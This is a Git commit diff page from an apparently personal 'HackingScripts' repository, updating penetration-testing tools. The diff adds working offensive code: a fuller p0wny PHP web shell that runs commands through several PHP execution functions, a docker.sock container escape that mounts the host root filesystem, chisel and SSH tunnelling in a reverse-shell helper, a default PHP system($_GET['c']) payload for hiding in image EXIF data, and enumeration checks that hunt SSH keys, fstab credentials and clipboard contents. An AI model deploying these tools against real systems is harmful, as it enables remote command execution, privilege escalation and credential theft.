Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update Dependencies + paramiko port forwarding + some bug fixes

Browse Source
This commit is contained in:
Roman Hergenreder 2023-09-13 21:16:52 +02:00
parent 9e6432d976
commit b1380967a4
19 changed files with 1735 additions and 1409 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -2,6 +2,12 @@
This repository contains self-made and common scripts for information gathering, enumeration and more. This repository contains self-made and common scripts for information gathering, enumeration and more.
### Installation
```bash
git clone git@romanh.de:Roman/HackingScripts
sudo ln -s HackingScripts $(python -c "import sys;print(sys.path[-1])")/hackingscripts
```
### Enumeration: Initial Scans ### Enumeration: Initial Scans
- first_scan.sh: Performs initial nmap scan - first_scan.sh: Performs initial nmap scan
- gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt - gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt

BIN
chisel
View File

Binary file not shown.

BIN
chisel64
View File

Binary file not shown.

21
deepce.sh
View File

@ -129,7 +129,7 @@ TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container
TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host." TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel" DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override" DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override\|cap_sys_rawio\|cap_mknod"
CONTAINER_CMDS="docker lxc rkt kubectl podman" CONTAINER_CMDS="docker lxc rkt kubectl podman"
USEFUL_CMDS="curl wget gcc nc netcat ncat jq nslookup host hostname dig python python2 python3 nmap" USEFUL_CMDS="curl wget gcc nc netcat ncat jq nslookup host hostname dig python python2 python3 nmap"
@ -561,7 +561,13 @@ containerCapabilities() {
printNo printNo
fi fi
else else
printError "Unknown (capsh not installed)" caps=$(grep Cap /proc/self/status)
capEff=$(grep CapEff /proc/self/status | cut -d ':' -f 2 | tr -d '\t')
printError "capsh not installed, listing raw capabilities"
printInstallAdvice "libcap2-bin"
printStatus "Current capabilities are:"
printStatus "$caps"
printStatus "> This can be decoded with: \"capsh --decode=${capEff}\""
fi fi
} }
@ -1046,9 +1052,18 @@ exploitDockerSock() {
nl nl
# Try to find an available docker image
json_data=$(curl -s --unix-socket /var/run/docker.sock http://localhost/images/json)
docker_img=$(echo "$json_data" | grep -o '"RepoTags":\["[^"]*' | grep -o '[^"]*$' | tail -1)
if [ -z "$docker_img" ]; then
printInfo 'No avaliable docker image found, using alpine'
docker_img="alpine"
fi
# Create docker container using the docker sock # Create docker container using the docker sock
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]" payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create) response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"$docker_img\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
if ! [ $? ]; then if ! [ $? ]; then
printError 'Something went wrong' printError 'Something went wrong'

23
fileserver.py
View File

@ -137,7 +137,6 @@ class HttpFileServer(HTTPServer):
self.prefix_routes = { } self.prefix_routes = { }
self.is_running = True self.is_running = True
self.listen_thread = None self.listen_thread = None
self.has_exited = False
def cleanPath(self, path): def cleanPath(self, path):
@ -231,9 +230,6 @@ class HttpFileServer(HTTPServer):
self.listen_thread.start() self.listen_thread.start()
return self.listen_thread return self.listen_thread
def start(self):
return self.serve_forever()
def get_base_url(): def get_base_url():
addr, port = self.server_address addr, port = self.server_address
if port != 80: if port != 80:
@ -244,27 +240,10 @@ class HttpFileServer(HTTPServer):
def stop(self): def stop(self):
self.is_running = False self.is_running = False
time.sleep(1) time.sleep(1)
self.shutdown()
try:
# dummy request
for i in range(3):
requests.get(f"{self.get_base_url()}/dummy")
if self.has_exited:
break
time.sleep(1)
except:
pass
if self.listen_thread != threading.currentThread(): if self.listen_thread != threading.currentThread():
self.listen_thread.join() self.listen_thread.join()
def serve_forever(self):
self.has_exited = False
while self.is_running:
self.handle_request()
self.has_exited = True
if __name__ == "__main__": if __name__ == "__main__":
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]: if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0]) print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])

2692
linpeas.sh
View File

File diff suppressed because one or more lines are too long

2
linux-exploit-suggester.sh
View File

@ -1,7 +1,7 @@
#!/bin/bash #!/bin/bash
# #
# Copyright (c) 2016-2022, @_mzet_ # Copyright (c) 2016-2023, https://github.com/mzet-
# #
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it # This is free software, and you are welcome to redistribute it

9
lse.sh
View File

@ -5,7 +5,7 @@
# Author: Diego Blanco <diego.blanco@treitos.com> # Author: Diego Blanco <diego.blanco@treitos.com>
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
# #
lse_version="4.10nw" lse_version="4.13nw"
##( Colors ##( Colors
# #
@ -611,6 +611,7 @@ lse_get_distro_codename() { #(
elif [ -f /etc/os-release ]; then elif [ -f /etc/os-release ]; then
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=` distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
echo "$distro" | grep -qi opensuse && distro=opsuse echo "$distro" | grep -qi opensuse && distro=opsuse
echo "$distro" | grep -qi rhel && distro=redhat
elif [ -f /etc/redhat-release ]; then elif [ -f /etc/redhat-release ]; then
grep -qi "centos" /etc/redhat-release && distro=centos grep -qi "centos" /etc/redhat-release && distro=centos
grep -qi "fedora" /etc/redhat-release && distro=fedora grep -qi "fedora" /etc/redhat-release && distro=fedora
@ -635,7 +636,7 @@ lse_get_pkg_version() { #(
pkg_name="$1" pkg_name="$1"
case "$lse_distro_codename" in case "$lse_distro_codename" in
debian|ubuntu) debian|ubuntu)
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3` pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^[ih]i' | tr -s ' ' | cut -d' ' -f3`
;; ;;
centos|redhat|fedora|opsuse|rocky|amzn) centos|redhat|fedora|opsuse|rocky|amzn)
pkg_version=`rpm -q "$pkg_name" 2>/dev/null` pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
@ -845,7 +846,7 @@ lse_run_tests_filesystem() {
#looking for credentials in /etc/fstab and /etc/mtab #looking for credentials in /etc/fstab and /etc/mtab
lse_test "fst120" "0" \ lse_test "fst120" "0" \
"Are there any credentials in fstab/mtab?" \ "Are there any credentials in fstab/mtab?" \
'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab' 'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials|cred)[=:]" /etc/fstab /etc/mtab'
#check if current user has mail #check if current user has mail
lse_test "fst130" "1" \ lse_test "fst130" "1" \
@ -910,7 +911,7 @@ lse_run_tests_filesystem() {
#check for SSH files anywhere #check for SSH files anywhere
lse_test "fst510" "2" \ lse_test "fst510" "2" \
"SSH files anywhere" \ "SSH files anywhere" \
'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;' 'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
#dump hosts.equiv file #dump hosts.equiv file
lse_test "fst520" "2" \ lse_test "fst520" "2" \

156
p0wny-shell.php
View File

@ -1,5 +1,10 @@
<?php <?php
$SHELL_CONFIG = array(
'username' => 'p0wny',
'hostname' => 'shell',
);
function expandPath($path) { function expandPath($path) {
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) { if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
exec("echo $match[1]", $stdout); exec("echo $match[1]", $stdout);
@ -8,8 +13,52 @@ function expandPath($path) {
return $path; return $path;
} }
function allFunctionExist($list = array()) {
foreach ($list as $entry) {
if (!function_exists($entry)) {
return false;
}
}
return true;
}
function executeCommand($cmd) {
$output = '';
if (function_exists('exec')) {
exec($cmd, $output);
$output = implode("\n", $output);
} else if (function_exists('shell_exec')) {
$output = shell_exec($cmd);
} else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
ob_start();
system($cmd);
$output = ob_get_contents();
ob_end_clean();
} else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
ob_start();
passthru($cmd);
$output = ob_get_contents();
ob_end_clean();
} else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) {
$handle = popen($cmd, 'r');
while (!feof($handle)) {
$output .= fread($handle, 4096);
}
pclose($handle);
} else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) {
$handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes);
$output = stream_get_contents($pipes[1]);
proc_close($handle);
}
return $output;
}
function isRunningWindows() {
return stripos(PHP_OS, "WIN") === 0;
}
function featureShell($cmd, $cwd) { function featureShell($cmd, $cwd) {
$stdout = array(); $stdout = "";
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) { if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
chdir(expandPath("~")); chdir(expandPath("~"));
@ -23,17 +72,17 @@ function featureShell($cmd, $cwd) {
return featureDownload($match[1]); return featureDownload($match[1]);
} else { } else {
chdir($cwd); chdir($cwd);
exec($cmd, $stdout); $stdout = executeCommand($cmd);
} }
return array( return array(
"stdout" => $stdout, "stdout" => base64_encode($stdout),
"cwd" => getcwd() "cwd" => base64_encode(getcwd())
); );
} }
function featurePwd() { function featurePwd() {
return array("cwd" => getcwd()); return array("cwd" => base64_encode(getcwd()));
} }
function featureHint($fileName, $cwd, $type) { function featureHint($fileName, $cwd, $type) {
@ -45,6 +94,9 @@ function featureHint($fileName, $cwd, $type) {
} }
$cmd = "/bin/bash -c \"$cmd\""; $cmd = "/bin/bash -c \"$cmd\"";
$files = explode("\n", shell_exec($cmd)); $files = explode("\n", shell_exec($cmd));
foreach ($files as &$filename) {
$filename = base64_encode($filename);
}
return array( return array(
'files' => $files, 'files' => $files,
); );
@ -54,12 +106,12 @@ function featureDownload($filePath) {
$file = @file_get_contents($filePath); $file = @file_get_contents($filePath);
if ($file === FALSE) { if ($file === FALSE) {
return array( return array(
'stdout' => array('File not found / no read permission.'), 'stdout' => base64_encode('File not found / no read permission.'),
'cwd' => getcwd() 'cwd' => base64_encode(getcwd())
); );
} else { } else {
return array( return array(
'name' => basename($filePath), 'name' => base64_encode(basename($filePath)),
'file' => base64_encode($file) 'file' => base64_encode($file)
); );
} }
@ -70,19 +122,40 @@ function featureUpload($path, $file, $cwd) {
$f = @fopen($path, 'wb'); $f = @fopen($path, 'wb');
if ($f === FALSE) { if ($f === FALSE) {
return array( return array(
'stdout' => array('Invalid path / no write permission.'), 'stdout' => base64_encode('Invalid path / no write permission.'),
'cwd' => getcwd() 'cwd' => base64_encode(getcwd())
); );
} else { } else {
fwrite($f, base64_decode($file)); fwrite($f, base64_decode($file));
fclose($f); fclose($f);
return array( return array(
'stdout' => array('Done.'), 'stdout' => base64_encode('Done.'),
'cwd' => getcwd() 'cwd' => base64_encode(getcwd())
); );
} }
} }
function initShellConfig() {
global $SHELL_CONFIG;
if (isRunningWindows()) {
$username = getenv('USERNAME');
if ($username !== false) {
$SHELL_CONFIG['username'] = $username;
}
} else {
$pwuid = posix_getpwuid(posix_geteuid());
if ($pwuid !== false) {
$SHELL_CONFIG['username'] = $pwuid['name'];
}
}
$hostname = gethostname();
if ($hostname !== false) {
$SHELL_CONFIG['hostname'] = $hostname;
}
}
if (isset($_GET["feature"])) { if (isset($_GET["feature"])) {
$response = NULL; $response = NULL;
@ -108,6 +181,8 @@ if (isset($_GET["feature"])) {
header("Content-Type: application/json"); header("Content-Type: application/json");
echo json_encode($response); echo json_encode($response);
die(); die();
} else {
initShellConfig();
} }
?><!DOCTYPE html> ?><!DOCTYPE html>
@ -125,6 +200,9 @@ if (isset($_GET["feature"])) {
background: #333; background: #333;
color: #eee; color: #eee;
font-family: monospace; font-family: monospace;
width: 100vw;
height: 100vh;
overflow: hidden;
} }
*::-webkit-scrollbar-track { *::-webkit-scrollbar-track {
@ -145,17 +223,21 @@ if (isset($_GET["feature"])) {
#shell { #shell {
background: #222; background: #222;
max-width: 800px;
margin: 50px auto 0 auto;
box-shadow: 0 0 5px rgba(0, 0, 0, .3); box-shadow: 0 0 5px rgba(0, 0, 0, .3);
font-size: 10pt; font-size: 10pt;
display: flex; display: flex;
flex-direction: column; flex-direction: column;
align-items: stretch; align-items: stretch;
max-width: calc(100vw - 2 * var(--shell-margin));
max-height: calc(100vh - 2 * var(--shell-margin));
resize: both;
overflow: hidden;
width: 100%;
height: 100%;
margin: var(--shell-margin) auto;
} }
#shell-content { #shell-content {
height: 500px;
overflow: auto; overflow: auto;
padding: 5px; padding: 5px;
white-space: pre-wrap; white-space: pre-wrap;
@ -168,20 +250,27 @@ if (isset($_GET["feature"])) {
text-align: center; text-align: center;
} }
@media (max-width: 991px) { :root {
--shell-margin: 25px;
}
@media (min-width: 1200px) {
:root {
--shell-margin: 50px !important;
}
}
@media (max-width: 991px),
(max-height: 600px) {
#shell-logo { #shell-logo {
font-size: 6px; font-size: 6px;
margin: -25px 0; margin: -25px 0;
} }
:root {
html, body, #shell { --shell-margin: 0 !important;
height: 100%;
width: 100%;
max-width: none;
} }
#shell { #shell {
margin-top: 0; resize: none;
} }
} }
@ -210,6 +299,7 @@ if (isset($_GET["feature"])) {
display: flex; display: flex;
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3); box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
border-top: rgba(255, 255, 255, .05) solid 1px; border-top: rgba(255, 255, 255, .05) solid 1px;
padding: 10px 0;
} }
#shell-input > label { #shell-input > label {
@ -230,6 +320,7 @@ if (isset($_GET["feature"])) {
font-size: 10pt; font-size: 10pt;
width: 100%; width: 100%;
align-self: center; align-self: center;
box-sizing: border-box;
} }
#shell-input div { #shell-input div {
@ -243,6 +334,7 @@ if (isset($_GET["feature"])) {
</style> </style>
<script> <script>
var SHELL_CONFIG = <?php echo json_encode($SHELL_CONFIG); ?>;
var CWD = null; var CWD = null;
var commandHistory = []; var commandHistory = [];
var historyPosition = 0; var historyPosition = 0;
@ -277,10 +369,10 @@ if (isset($_GET["feature"])) {
} else { } else {
makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) { makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
if (response.hasOwnProperty('file')) { if (response.hasOwnProperty('file')) {
featureDownload(response.name, response.file) featureDownload(atob(response.name), response.file)
} else { } else {
_insertStdout(response.stdout.join("\n")); _insertStdout(atob(response.stdout));
updateCwd(response.cwd); updateCwd(atob(response.cwd));
} }
}); });
} }
@ -291,7 +383,9 @@ if (isset($_GET["feature"])) {
function _requestCallback(data) { function _requestCallback(data) {
if (data.files.length <= 1) return; // no completion if (data.files.length <= 1) return; // no completion
data.files = data.files.map(function(file){
return atob(file);
});
if (data.files.length === 2) { if (data.files.length === 2) {
if (type === 'cmd') { if (type === 'cmd') {
eShellCmdInput.value = data.files[0]; eShellCmdInput.value = data.files[0];
@ -341,8 +435,8 @@ if (isset($_GET["feature"])) {
var promise = getBase64(element.files[0]); var promise = getBase64(element.files[0]);
promise.then(function (file) { promise.then(function (file) {
makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) { makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
_insertStdout(response.stdout.join("\n")); _insertStdout(atob(response.stdout));
updateCwd(response.cwd); updateCwd(atob(response.cwd));
}); });
}, function () { }, function () {
_insertStdout('An unknown client-side error occurred.'); _insertStdout('An unknown client-side error occurred.');
@ -368,7 +462,7 @@ if (isset($_GET["feature"])) {
var splittedCwd = cwd.split("/"); var splittedCwd = cwd.split("/");
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1]; shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
} }
return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#"; return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
} }
function updateCwd(cwd) { function updateCwd(cwd) {
@ -378,7 +472,7 @@ if (isset($_GET["feature"])) {
return; return;
} }
makeRequest("?feature=pwd", {}, function(response) { makeRequest("?feature=pwd", {}, function(response) {
CWD = response.cwd; CWD = atob(response.cwd);
_updatePrompt(); _updatePrompt();
}); });

BIN
pspy
View File

Binary file not shown.

BIN
pspy64
View File

Binary file not shown.

104
rev_shell.py
View File

@ -11,6 +11,13 @@ import threading
import paramiko import paramiko
import readline import readline
import base64 import base64
import select
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
class ShellListener: class ShellListener:
@ -162,6 +169,97 @@ class ShellListener:
if permissions: if permissions:
self.sendline(f"chmod {permissions} {path}") self.sendline(f"chmod {permissions} {path}")
class ParamikoTunnelServer(SocketServer.ThreadingTCPServer):
daemon_threads = True
allow_reuse_address = True
class ParamikoTunnel:
def __init__(self, shell, ports):
self.shell = shell
self.ports = ports
self.verbose = False
self.is_running = True
self.on_message = []
self.listen_threads = []
self.servers = []
def start_background(self):
for port in self.ports:
thread = threading.Thread(target=self.start, args=(port, ))
thread.start()
self.listen_threads.append(thread)
return self.listen_threads
def start(self, port):
this = self
class SubHandler(ParamikoTunnelHandler):
peer = this.shell.get_transport().sock.getpeername()
chain_host = "127.0.0.1"
chain_port = port
ssh_transport = this.shell.get_transport()
def log(self, message):
if this.verbose:
print(message)
forward_server = ParamikoTunnelServer(("127.0.0.1", port), SubHandler)
self.servers.append(forward_server)
forward_server.serve_forever()
def close(self):
self.is_running = False
for server in self.servers:
server._BaseServer__shutdown_request = True
for thread in self.listen_threads:
thread.join()
class ParamikoTunnelHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
chan = self.ssh_transport.open_channel(
"direct-tcpip",
(self.chain_host, self.chain_port),
self.request.getpeername(),
)
except Exception as e:
self.log(
"Incoming request to %s:%d failed: %s"
% (self.chain_host, self.chain_port, repr(e))
)
return
if chan is None:
self.log(
"Incoming request to %s:%d was rejected by the SSH server."
% (self.chain_host, self.chain_port)
)
return
self.log(
"Connected! Tunnel open %r -> %r -> %r"
% (
self.request.getpeername(),
chan.getpeername(),
(self.chain_host, self.chain_port),
)
)
while True:
r, w, x = select.select([self.request, chan], [], [])
if self.request in r:
data = self.request.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
self.request.send(data)
peername = self.request.getpeername()
chan.close()
self.request.close()
self.log("Tunnel closed from %r" % (peername,))
def generate_payload(type, local_address, port, index=None): def generate_payload(type, local_address, port, index=None):
commands = [] commands = []
@ -238,7 +336,13 @@ def create_tunnel(shell, ports: list):
t.start() t.start()
shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &") shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
return t
elif isinstance(shell, paramiko.SSHClient): elif isinstance(shell, paramiko.SSHClient):
paramiko_tunnel = ParamikoTunnel(shell, ports)
paramiko_tunnel.start_background()
return paramiko_tunnel
# TODO: https://github.com/paramiko/paramiko/blob/88f35a537428e430f7f26eee8026715e357b55d6/demos/forward.py#L103 # TODO: https://github.com/paramiko/paramiko/blob/88f35a537428e430f7f26eee8026715e357b55d6/demos/forward.py#L103
pass pass

0
uptux.py Normal file → Executable file
View File

45
util.py
View File

@ -1,7 +1,9 @@
#!/usr/bin/env python #!/usr/bin/env python
import random import random
import math
import socket import socket
import itertools
import netifaces as ni import netifaces as ni
import string import string
import sys import sys
@ -44,15 +46,20 @@ def exit_with_error(res, err):
exit() exit()
def assert_status_code(res, status_code, err=None): def assert_status_code(res, status_code, err=None):
if res.status_code != status_code: if type(status_code) == int and res.status_code != status_code:
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
exit_with_error(res, err) exit_with_error(res, err)
elif hasattr(status_code, '__iter__') and res.status_code not in status_code:
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected one of: {','.join(status_code)}" if err is None else err
exit_with_error(res, err)
def assert_header_present(res, header, err=None): def assert_location(res, location, err=None):
if header in res.headers: assert_header_present(res, "Location")
location_header = res.headers["Location"].lower()
if location_header == location.lower():
return return
err = f"[-] '{res.url}' did not return header: {header}" if err is None else err err = f"[-] '{res.url}' returned unexpected location {location_header}, expected: {location}" if err is None else err
exit_with_error(res, err) exit_with_error(res, err)
def assert_content_type(res, content_type, err=None): def assert_content_type(res, content_type, err=None):
@ -66,6 +73,13 @@ def assert_content_type(res, content_type, err=None):
err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err
exit_with_error(res, err) exit_with_error(res, err)
def assert_header_present(res, header, err=None):
if header in res.headers:
return
err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
exit_with_error(res, err)
def openServer(address, ports=None): def openServer(address, ports=None):
listenPort = None listenPort = None
retry = True retry = True
@ -149,6 +163,29 @@ def pad(x, n):
x += (n-(len(x)%n))*b"\x00" x += (n-(len(x)%n))*b"\x00"
return x return x
def xor(a, b):
if len(a) == 0 or len(b) == 0:
return a
if len(a) < len(b):
a *= int(math.ceil((len(b)/len(a))))
a = a[0:len(b)]
elif len(b) < len(a):
b *= int(math.ceil((len(a)/len(b))))
b = b[0:len(a)]
if type(a) == str and type(b) == str:
return "".join([chr(ord(c1) ^ ord(c2)) for (c1,c2) in zip(a, b) ])
else:
if type(a) != bytes:
a = a.encode()
if type(b) != bytes:
b = b.encode()
return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None): def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
import exif import exif

BIN
win/chisel.exe
View File

Binary file not shown.

BIN
win/chisel64.exe
View File

Binary file not shown.

14
win/winPEAS.bat
View File

@ -10,6 +10,14 @@ REM Registry scan of other drives besides
REM /////true or false REM /////true or false
SET long=false SET long=false
REM Check if the current path contains spaces
SET "CurrentFolder=%~dp0"
IF "!CurrentFolder!" NEQ "!CurrentFolder: =!" (
ECHO winPEAS.bat cannot run if the current path contains spaces.
ECHO Exiting.
EXIT /B 1
)
:Splash :Splash
ECHO. ECHO.
CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m" CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m"
@ -52,7 +60,7 @@ CALL :ColorLine " %E%41mUse it at your own networks and/or with the network ow
ECHO. ECHO.
:SystemInfo :SystemInfo
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO"
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
@ -404,7 +412,7 @@ CALL :T_Progress 1
:CurrentClipboard :CurrentClipboard
CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD" CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
ECHO. [i] Any password inside the clipboard? ECHO. [i] Any passwords inside the clipboard?
powershell -command "Get-Clipboard" 2>nul powershell -command "Get-Clipboard" 2>nul
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -565,7 +573,7 @@ CALL :T_Progress 2
:AppCMD :AppCMD
CALL :ColorLine " %E%33m[+]%E%97m AppCmd" CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
ECHO. ECHO.
CALL :T_Progress 2 CALL :T_Progress 2

BIN
win/winPEAS.exe
View File

Binary file not shown.

BIN
win/winPEASx64.exe
View File

Binary file not shown.